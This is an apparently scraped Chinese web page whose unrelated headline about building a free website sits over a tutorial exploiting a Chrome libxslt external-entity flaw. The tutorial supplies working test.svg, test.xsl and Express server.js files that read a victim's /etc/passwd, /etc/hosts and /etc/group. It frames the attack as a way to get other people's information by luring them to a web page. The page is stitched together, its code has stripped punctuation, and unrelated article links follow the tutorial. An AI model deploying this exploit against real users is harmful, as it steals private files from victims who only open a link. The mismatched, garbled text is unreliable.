当前位置: 首页 > news >正文

如何免费创建一个自己的网站用dw制作个人简介网页步骤

news 2025/9/16 5:24:07
如何免费创建一个自己的网站,用dw制作个人简介网页步骤,城乡建设部网站施工员证书查询,淘宝客网站虚拟主机漏洞描述 该漏洞的存在是由于 Google Chrome 中用户提供的 XML 输入验证不足。远程攻击者可以创建特制网页#xff0c;诱骗受害者访问该网页并获取用户系统上的敏感信息。远程攻击者可利用该漏洞通过构建的 HTML 页面绕过文件访问限制#xff0c;导致chrome任意文件读取。Li…漏洞描述 该漏洞的存在是由于 Google Chrome 中用户提供的 XML 输入验证不足。远程攻击者可以创建特制网页诱骗受害者访问该网页并获取用户系统上的敏感信息。远程攻击者可利用该漏洞通过构建的 HTML 页面绕过文件访问限制导致chrome任意文件读取。Libxslt 是在基于 WebKit 的浏览器如 chromesafari 等中默认使用的 XSL 库。Libxslt 允许 XSL document() 方法加载的文档内部存在外部实体。攻击者可以绕过安全限制从 http(s):// 网址访问 file:// 网址并获取文件访问权限 影响的版本Google Chrome 116.0.5845.96 效果如下 Google Chrome下载地址https://registry.npmmirror.com/binary.html?pathchromedriver/ 根据自己需求下载即可 这里我们要用到三个文件将这三个文件传入到自己搭建的web服务文件中即可也可以是博客网站的文件中总之是可以用浏览器访问的就好那我们看那三个文件吧 test.svg ?xml version1.0 encodingUTF-8? ?xml-stylesheet typetext/xsl href#?xsl:stylesheet idcolor-change version1.0 xmlns:xslhttp://www.w3.org/1999/XSL/Transformxsl:template match/svg version1.1 idCapa_1 xmlnshttp://www.w3.org/2000/svg xmlns:xlinkhttp://www.w3.org/1999/xlink x0px y0px viewBox0 0 1000 1000foreignObject idmyObj width1000 height1000div stylefont-size:xxx-large xmlnshttp://www.w3.org/1999/xhtmla href##Copy me#/abr/XSL: xsl:value-of selectsystem-property(xsl:version)/br/Vendor: xsl:value-of selectsystem-property(xsl:vendor)/br/Vendor URL: xsl:value-of selectsystem-property(xsl:vendor-url)/br/document() xsl:copy-of selectdocument(test.xsl)//div/foreignObject/svg/xsl:template /xsl:stylesheet text.xsl ?xml version1.0 encodingUTF-8? !DOCTYPE p [ !ENTITY passwd SYSTEM file:///etc/passwd !ENTITY hosts SYSTEM file:///etc/hosts !ENTITY group SYSTEM file://localhost/etc/group ] pp styleborder-style: dotted;/etc/passwd: passwd;/pp styleborder-style: dotted;/etc/hosts: hosts;/pp styleborder-style: dotted;/etc/group: group;/p /p server.js const express require(express); const path require(path);const app express(); const port 3000;app.get(/test.svg, (req, res) {res.sendFile(path.join(__dirname, test.svg)); });app.get(/test.xsl, (req, res) {res.set(Access-Control-Allow-Origin, *);res.sendFile(path.join(__dirname, test.xsl)); });app.listen(port, () {console.log(Example app listening on port ${port}); });要将这三个文件放到自己搭建的web服务的文件中即可也可以是博客网站的文件下 注意这里的三个文件是linux的版本也就是说Google Chrome也要是linux版本的才可以用如果要用windows版本的则需要对这三个文件进行修改然后下个windows版本的Google Chrome即可 而这里要注意的是我们必须要用Google Chrome才能获取到别人的信息 用Google Chrome打开上面的上传的文件如http://xxx.xxx.xxx/test.svg 然后我们就可以看到如下图所示获取到别人的本机的 passwd 文件和 hosts 文件
http://www.tj-hxxt.cn/news/137068.html

相关文章:

  • 做网站电话销售说辞旅行社营业部管理办法
  • 景县网站建设公司外贸产品网站建设
  • 伪静态就是把网站地址一元购网站建设
  • 网站建设服务费入推广计划书怎么写
  • 销售型网站建设基本要素WordPress创建简码
  • 网站域名以co与com有什么不同网站做百度百科
  • 企业网站管理系统使用教程全国工厂的网站建设
  • 企业网站建设 阿里云wordpress禁止谷歌字体大小
  • 建站导航如何用vs做网站
  • 网站建设价格是哪些方面决定的部队网站建设方案
  • 门户型网站建设招商局网站建设方案
  • 旅行网站开发免费做网站页头图
  • 东莞做企业网站WordPress英文换行
  • 做网站的荣誉证书网络营销期末考试试题及答案
  • 万网网站域名注册2008 iis 添加 网站 权限设置权限
  • 南京网站优化步骤完整的外贸出口流程
  • 福州mip网站建设头像设计
  • 千岛湖建设集团网站酷家乐装修设计软件手机版免费版
  • 网站后台编辑器下载网页设计实验报告小结
  • 手机系统优化seo沈阳
  • 贵阳网站建设制作公司佛山小网站建设
  • 国内外包网站怎么做网站的rss
  • 男女做爰视频网站在线视频装修论坛
  • 网站为什么吸引人网站设计制作价格怎么样
  • 邵阳红网站网站建设这个职业是什么
  • 网站建设(中企动力)哪个购物软件最便宜
  • 免费行业报告网站如何拉下对手网站
  • 网站结构的规划济南自助建站系统
  • 招聘网站开发源代码蜜雪冰城网页设计素材
  • 动漫做暧视频在线观看网站做临时网站